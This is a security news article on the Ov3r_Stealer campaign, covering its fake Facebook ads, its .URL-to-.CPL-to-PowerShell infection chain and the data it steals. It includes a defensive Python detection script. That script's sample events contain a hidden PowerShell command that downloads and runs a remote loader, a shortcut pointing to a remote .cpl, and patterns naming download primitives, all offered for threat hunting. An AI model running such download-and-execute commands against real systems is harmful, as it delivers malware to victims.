Fake Facebook Ads Spreading 'Ov3r_Stealer' To Steal Crypto And Creds
Threat actors are using fake Facebook job ads to trick victims into installing Ov3r_Stealer, a new Windows information stealer.
Trustwave SpiderLabs told The Hacker News that “this malware is designed to steal credentials and crypto wallets and send them to a Telegram channel that the threat actor monitors.”
Ov3r_Stealer harvests IP-based geolocation, hardware details, passwords, cookies, credit card data, autofill entries, browser extensions, crypto wallets, Microsoft Office documents, and the list of installed antivirus products from the infected host.
The campaign's ultimate goal is unclear, but stolen data of this kind is commonly sold on to other threat actors, and Ov3r_Stealer could be modified to drop additional payloads such as QakBot.
The attack initiates with a malicious PDF file seemingly hosted on OneDrive, enticing users to click on an “Access Document” button.
Trustwave found the PDF posted both on a fake Facebook account impersonating Amazon CEO Andy Jassy and in Facebook ads promoting digital advertising opportunities.
The button leads to a .URL internet shortcut file that poses as a DocuSign document and is hosted on Discord's CDN. The shortcut delivers a Control Panel item (.CPL) file, which is executed by the Windows Control Panel host binary ("control.exe").
Executing the CPL file retrieves a PowerShell loader ("DATA1.txt") from GitHub, which in turn runs Ov3r_Stealer.
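The chain above (.URL shortcut to a remote .CPL, control.exe executing it, PowerShell pulling a loader from GitHub) leaves telemetry that is easy to hunt for. The following is an added example written for this page, not code from Trustwave or from the malware: it flags an internet shortcut whose target is a remote .cpl, and runs two process-creation checks over constructed sample events. The event field names (Image, CommandLine, ParentImage) follow the Sysmon Event ID 1 convention and are an assumption, as are the hostnames, paths and the GitHub URL in the samples; they are illustrative, not indicators from the report. The rundll32.exe parent is included because control.exe hands a .cpl to rundll32.exe (shell32 Control_RunDLL) on a stock Windows install, so the PowerShell child may appear under either binary.

```python
"""Detection logic for the Ov3r_Stealer delivery chain described above.

Added example. Sample shortcut and events are constructed, not real telemetry.
Field names assume Sysmon Event ID 1 (ProcessCreate) naming.
"""
import re
from configparser import ConfigParser

# --- Stage 1: .URL internet shortcut pointing at a remote Control Panel item ---
# Constructed example; hostname and path are illustrative placeholders.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=https://cdn.discordapp.com/attachments/1111/2222/DocuSign.cpl
IconIndex=0
"""

# A .cpl reached over HTTP(S) or a UNC path; local shortcuts to System32 are normal.
REMOTE_CPL_RE = re.compile(r"^(?:https?://|\\\\)\S+\.cpl$", re.IGNORECASE)


def url_file_points_to_remote_cpl(content: str) -> bool:
    """True if an [InternetShortcut] URL= target is a .cpl on a remote or UNC path."""
    cp = ConfigParser(interpolation=None)  # option names are matched case-insensitively
    cp.read_string(content)
    target = cp.get("InternetShortcut", "URL", fallback="").strip()
    return bool(REMOTE_CPL_RE.match(target))


# --- Stage 2 and 3: process-creation events (constructed) ---------------------
SAMPLE_EVENTS = [
    # benign: a built-in Control Panel applet opened from System32
    {"Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" C:\Windows\System32\timedate.cpl',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # suspicious: control.exe loading a .cpl dropped into the user's Downloads folder
    {"Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" C:\Users\alice\Downloads\DocuSign.cpl',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # suspicious: PowerShell download cradle whose parent is the .cpl host (rundll32)
    # the repository path in this URL is a placeholder, not the one named in the report
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "iex (iwr '
                    'https://raw.githubusercontent.com/placeholder/repo/main/DATA1.txt)"',
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# quoted or unquoted argument ending in .cpl
CPL_ARG_RE = re.compile(r'"([^"]+?\.cpl)"|(\S+?\.cpl)\b', re.IGNORECASE)
# common PowerShell download primitives
DOWNLOAD_CRADLE_RE = re.compile(
    r"iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer",
    re.IGNORECASE)
CPL_HOSTS = ("\\control.exe", "\\rundll32.exe")


def control_runs_cpl_outside_system(event: dict) -> bool:
    """control.exe given a .cpl that does not live under System32/SysWOW64."""
    if not event["Image"].lower().endswith("\\control.exe"):
        return False
    for m in CPL_ARG_RE.finditer(event["CommandLine"]):
        path = (m.group(1) or m.group(2)).lower()
        if not path.startswith(SYSTEM_DIRS):
            return True
    return False


def powershell_cradle_from_cpl_host(event: dict) -> bool:
    """PowerShell with a download cradle whose parent is control.exe or rundll32.exe."""
    img = event["Image"].lower()
    if not img.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False
    if not event["ParentImage"].lower().endswith(CPL_HOSTS):
        return False
    return bool(DOWNLOAD_CRADLE_RE.search(event["CommandLine"]))


def triage(events: list) -> list:
    """Return (event index, reason) for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        if control_runs_cpl_outside_system(ev):
            hits.append((i, "control.exe loading .cpl outside System32"))
        if powershell_cradle_from_cpl_host(ev):
            hits.append((i, "PowerShell download cradle spawned by Control Panel host"))
    return hits


if __name__ == "__main__":
    print("remote .cpl shortcut:", url_file_points_to_remote_cpl(SUSPICIOUS_URL_FILE))
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Both process rules are deliberately narrow: a .cpl outside the system directories is rare on managed hosts, and PowerShell under control.exe or rundll32.exe is rarer still, so either rule alone is a reasonable alert, and the two firing on the same host within minutes is a strong signal of this chain.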
Facebook Job Ads
Trend Micro recently uncovered threat actors exploiting a Windows Defender SmartScreen bypass vulnerability to distribute Phemedrone Stealer through a nearly identical infection chain.
Both campaigns use the same GitHub repository (nateeintanan2527), and Ov3r_Stealer and Phemedrone share code-level similarities.
“This malware has recently been reported, and it may be that Phemedrone was re-purposed and renamed to Ov3r_Stealer,” warned Trustwave. “The main difference between the two is that Phemedrone is written in C#.”
Hudson Rock discovered that threat actors are advertising their access to Binance, Google, Meta, and TikTok law enforcement request portals, utilizing infostealer credentials.
Researchers are also tracking CrackedCantil infections, in which cracked software is used to deploy loaders such as PrivateLoader and SmokeLoader, which in turn deliver information stealers, crypto miners, proxy botnets, and ransomware.
It's crucial for individuals and organizations to remain vigilant and exercise caution when interacting with unfamiliar links or documents, especially those originating from social media platforms.